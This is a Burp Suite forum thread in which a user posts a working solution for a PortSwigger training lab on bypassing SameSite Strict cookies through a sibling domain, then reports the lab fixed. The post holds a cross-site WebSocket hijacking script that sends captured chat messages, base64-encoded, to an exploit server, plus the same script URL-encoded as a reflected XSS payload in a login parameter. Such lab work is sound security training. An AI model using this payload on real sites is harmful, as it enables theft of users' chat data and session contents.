Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: SameSite Strict bypass via sibling domain - solution is broken

Jack | Last updated: Jul 12, 2024 11:01AM UTC

Hi this is my solution and and works fine when clicking "view exploit" (i see my messages at the access log) but when I deliver to victim there is no incoming request. can you pls fix the lab? I was going crazy about what can be the issue then I realized if it works at "view exploit" but not when delivered then the lab is broken. I tried also with fetch, with document.location.href etc, all worked for me but not when delivered GIF: https://postimg.cc/cgY3Mrv6 <script> let newWebSocket = new WebSocket("wss://0a1100c20450ae4880d662fe006900e9.web-security-academy.net/chat"); newWebSocket.onopen = function (evt) { newWebSocket.send("READY"); }; newWebSocket.onmessage = function (evt) { var message = evt.data; fetch('https://exploit-0a6700500409aed5803a618f017d00eb.exploit-server.net/exploit?message=' + btoa(message), { method: 'GET', mode: 'no-cors', }); }; </script> <script> document.location("https://cms-0a1100c20450ae4880d662fe006900e9.web-security-academy.net/login?username=%3c%73%63%72%69%70%74%3e%0a%20%20%20%20%6c%65%74%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%20%3d%20%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%22%77%73%73%3a%2f%2f%30%61%31%31%30%30%63%32%30%34%35%30%61%65%34%38%38%30%64%36%36%32%66%65%30%30%36%39%30%30%65%39%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%22%29%3b%0a%0a%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6f%70%65%6e%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%20%20%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%73%65%6e%64%28%22%52%45%41%44%59%22%29%3b%0a%20%20%20%20%7d%3b%0a%0a%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6d%65%73%73%61%67%65%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%20%20%20%20%20%20%76%61%72%20%6d%65%73%73%61%67%65%20%3d%20%65%76%74%2e%64%61%74%61%3b%0a%0a%20%20%20%20%66%65%74%63%68%28%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%36%37%30%30%35%30%30%34%30%39%61%65%64%35%38%30%33%61%36%31%38%66%30%31%37%64%30%30%65%62%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%65%78%70%6c%6f%69%74%3f%6d%65%73%73%61%67%65%3d%27%20%2b%20%62%74%6f%61%28%6d%65%73%73%61%67%65%29%2c%20%7b%0a%20%20%20%20%20%20%20%20%6d%65%74%68%6f%64%3a%20%27%47%45%54%27%2c%0a%20%20%20%20%6d%6f%64%65%3a%20%27%6e%6f%2d%63%6f%72%73%27%2c%0a%20%20%20%20%20%20%20%20%7d%29%3b%0a%20%20%20%20%7d%3b%0a%3c%2f%73%63%72%69%70%74%3e&password=ds"); </script>

Ben, PortSwigger Agent | Last updated: Jul 15, 2024 09:43AM UTC

Hi Jack, Are you seeing any interactions in the access log when you deliver your exploit?

Jack | Last updated: Jul 15, 2024 06:34PM UTC

it got fixed somehow

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.